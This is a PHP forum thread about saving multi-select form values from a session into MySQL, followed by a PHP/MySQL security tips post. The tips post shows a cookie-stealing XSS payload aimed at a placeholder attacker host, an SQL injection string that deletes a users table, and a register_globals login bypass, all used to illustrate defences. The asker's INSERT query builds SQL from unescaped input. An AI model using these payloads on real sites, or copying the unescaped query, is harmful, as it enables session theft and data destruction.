[samf]

Hi,
I am creating an online form which should take information to from one page using a multiple-select box then display the selected fields in order confirmation page. This part of the code works fine, Then I press the submit (complete order) button and the information should then get stored into the MySQL database as a string. So if I selected jan,feb and apr it will store into MySQL like jan,feb,apr all in the same field.

I think the main problem is that the information that is stored in the confirmation page is not being registered with the final order complete page.

Here is the code:

FirstPage:


Code:

		  <select name="ilm[]" size="7" multiple="multiple">
			<option value="January"> January </option>
			<option value="February"> February </option>
			<option value="April"> April </option>
			<option value="May-Buyers-Guide"> May Buyers Guide </option>
			<option value="July"> July </option>
			<option value="August"> August </option>
			<option value="October"> October </option>
		  </select></center>	</td>

Just a normal Multiple-select table.

Second page:


Code:

	 	 <?php
		$_SESSION['details'] =$_POST['ilm'];

		$info2=$_SESSION['details'];
		if ($info2){
//			$str=implode(",", $info2);
			$str='';
			foreach ($info2 as $t){
				$str.=$t.', ';
			}
			$str=trim ($str,', ');
			echo $str.'<br>';
		}
	 ?>	

This is the code I use to display the select information from the table as a string.

Third Page:

This is the code that I am using to try and put the string into mysql

Code:

$sql="INSERT INTO onlineform (ilmissue) VALUES ('".implode(",",$_SESSION['details'])."')";
	mysql_query($sql);

I have tried echo'ing the string and it does not display the it probably meaning there is something else wrong which I cannot find. It seems not to find the on the seconds page therefore not inserting it into the MysQl database.

Any help will be appreciated.

Thanks

PS: I have got SESSION_Start on all the pages at the very top. Also the code does not display teh forms thats because I would be sending you about 700lines of code that is unnecessary.


Code:

<form name="form1" method="post" action="./onlineFormPage2.php">

all of the form headers look like this and are pointing to the correct php page.

[CTphpnwb]

This works for me:

<?php
var_dump($_POST);
$x=$_POST['ilm'];
$z=count($x);
echo "<Br>".$z."<Br>";
echo "<Br>".$x[0]."<Br>";
?>

<html>
<P>Select on or more: 
<Form action="<?php echo $php_self ?>" method="post">
<select multiple size=4 name="ilm[]" >" >
<option> January </option>
<option> February </option>
<option> April </option>
<option> May Buyers Guide </option>
<option> July </option>
<option> August </option>
<option> October </option>
</select>
<INPUT type="submit" value="Send">
</P>
</form>

[samf]

Thanks for the help, Would you please be able to explain what this code does? Or specifically what bit of code does what. I like to know how everything works

Thanks

[CTphpnwb]

I've inserted comments, but if you run the code, you'll see what it does. It's all self contained. There is no need for separate pages.

<?php
var_dump($_POST); //This echos the value(s) for post so that you can see if anything has been posted. For testing purposes only.
$x=$_POST['ilm']; // Set $x to the value of the ilm array from the multiple selection below.
$z=count($x); // Set $z to the number of items in the $x array.
echo "<Br>".$z."<Br>"; // Display the number of items in the $x array.
echo "<Br>".$x[0]."<Br>"; // Display the first item in the $x array. Change 0 to 1,2, etc. to see other items.
?>

<html><!-- start html -->
<P>Select on or more: 
<Form action="<?php echo $php_self ?>" method="post"> <!-- form action is to post back to same page -->
<select multiple size=4 name="ilm[]" >" > <!-- show 4 items/scroll to rest of list -->
<option> January </option>
<option> February </option>
<option> April </option>
<option> May Buyers Guide </option>
<option> July </option>
<option> August </option>
<option> October </option>
</select>
<INPUT type="submit" value="Send"> <!-- set input button 'send' -->
</P>
</form>

Note that php and html can be mixed on the same page. There is php in the form action html above to tell it to self post.

[samf]

Ok I get it better now, thanks.

The thing is the structure is (which I cant change):

Page1 Page2 Page3
Selections ---> Display selections ---> Selections confirmed and added to mysql.

Im actually only chaning a small section of a online form. The first two pages seem to work fine on mine and on the second page I can view my selections but it does not seem to want to be inserted into mysql.

This post has been edited by samf: 04 September 2008 - 05:27 AM

[smith123]

PHP MySQL Web Development Security Tips - 14 tips you should know when developing with PHP and MySQL

I read about many of these points in books and tutorials but I was rather lazy to think about many of them initially learned some of these lessons the hard way. Fortunately I didn't lose any major data over security issues with PHP MySQL, but my suggestion to everyone who is new to PHP is to read these tips and apply them *before* you end up with a big mess. I also learnt this while working with software development company


1. Do not trust user input
If you are expecting an integer call intval() (or use cast) or if you don't expect a username to have a dash (-) in it, check it with strstr() and prompt the user that this username is not valid.

Here is an example:
PHP Code:
$post_id = intval($_GET['post_id']);
mysql_query("SELECT * FROM post WHERE id = $post_id");

Now $post_id will be an integer for sure


2. Validate user input on the server side
If you are validating user input with Javascript, be sure to do it on the server side too, because for bypassing your Javascript validation a user just needs to turn their Javascript off.
Javascript validation is only good to reduce the server load.


3. Do not use user input directly in your SQL queries
Use mysql_real_escape_string() to escape the user input.
PHP.net recommends this function: (well a little different)
PHP Code:
function escape($values) {
if(is_array($values)) {
$values = array_map(array(&$this, 'escape'), $values);
} else {
/* Quote if not integer */
if ( !is_numeric($values) || $values{0} == '0' ) {
$values = "'" .mysql_real_escape_string($values) . "'";
}
}
return $values;
}

Then you can use it like this:
PHP Code:
$username = escape($_POST['username']);
mysql_query("SELECT * FROM user WHERE username = $username"); /* escape() will also adds quotes to strings automatically */


4. In your SQL queries don't put integers in quotes
For example $id is suppose to be an integer:
PHP Code:
$id = "0; DELETE FROM users";
$id = mysql_real_escape_string($id); // 0; DELETE FROM users - mysql_real_escape_string doesn't escape ;
mysql_query("SELECT * FROM users WHERE id='$id'");

Note that, using intval() would fix the problem here.


5. Always escape the output
This will prevent XSS (Cross Site Scripting) attacks, imagine you receive and save some data from a user and you want to display this data on a web page later (maybe his/her bio or username) and the user puts this bit of code in the input field along with his bio:

[code]
<script>alert('');</script>
[code]

If you display the raw user input on a web page this will be very ugly, it can even be worse if a user inputs this code instead:
Code:
<script>document.location.replace('http://attacker/?c='+document.cookie);</script>
With this, an attacker can steal cookies from whoever visits that certain page (containing bio etc.) and this includes session cookies with session IDs in them so the attacker can hijack your users' sessions and appear to be logged in as other users.

When displaying user input on a page use htmlentities($user_bio, ENT_QUOTES, 'UTF-8');


6. When uploading files, validate the file mime type
If you are expecting images, make sure the file you are receiving is an image or it might be a PHP script that can run on your server and does whatever damage you can imagine.

One quick way is to check the file extension:
PHP Code:
$valid_extensions = array('jpg', 'gif', 'png'); // ...

$file_name = basename($_FILES['userfile']['name']);
$_file_name = explode('.', $file_name);
$ext = $_file_name[ count($_file_name) - 1 ];

if( !in_array($ext, $valid_extensions) ) {
/* This file is invalid */
}

Note that validating extension is a very simple way, and not the best way, to validate file uploads but it's effective;
simply because unless you have set your server to interpret .jpg files as PHP scripts then you are fine.


7. If you are using 3rd party code libraries, be sure to keep them up to date
If you are using code libraries like Smarty or ADODB etc. be sure to always download the latest version.


8. Give your database users just enough permissions
If a database user is never going to drop tables, then when creating that user don't give it drop table permissions, normally just SELECT, UPDATE, DELETE, INSERT should be enough.


9. Do not allow hosts other than localhost to connect to your database
If you need to, add only that particular host or IP as necessary but never, ever let everyone connect to your database server.


10. Your library file extensions should be PHP
.inc files will be written to the browser just like text files (unless your server is setup to interpret them as PHP scripts), users will be able to see your messy code (kidding ) and possibly find exploits or see your passwords etc.
Have extensions like config.inc.php or have a .htaccess file in your extension (templates, libs etc.) folders with this one line:
Code:
deny from all

11. Have register globals off or define your variables first
Register globals can be very dangerous, consider this bit of code:
PHP Code:
if( user_logged_in() ) {
$auth = true;
}

if( $auth ) {
/* Do some admin stuff */
}

Now with register globals on an attacker can view this page like this and bypass your authentication:
http://yourwebsite.c...dmin.php?auth=1

If you have registered globals on and you can't turn it off for some reason you can fix these issues by defining your variables first:
PHP Code:
$auth = false;
if( user_logged_in() ) {
$auth = true;
}

if( $auth ) {
/* Do some admin stuff */
}

Defining your variables first is a good programming practice that I suggest you follow anyway.



12. Keep PHP itself up to date
Just take a look at www.php.net and see release announcements and note how many security issues they fix on every release to understand why this is important.


13. Read security books
Always find new books about PHP security to read; you can start by reading the 4th book in the PHP Thread, which is one of the best books on PHP security and the author is a member of the PHP team so he knows the internals very well.


14. Contribute to this list
Feel free to reply to this thread and add to this list, it will be helpful for everyone!

http://www.infysolutions.com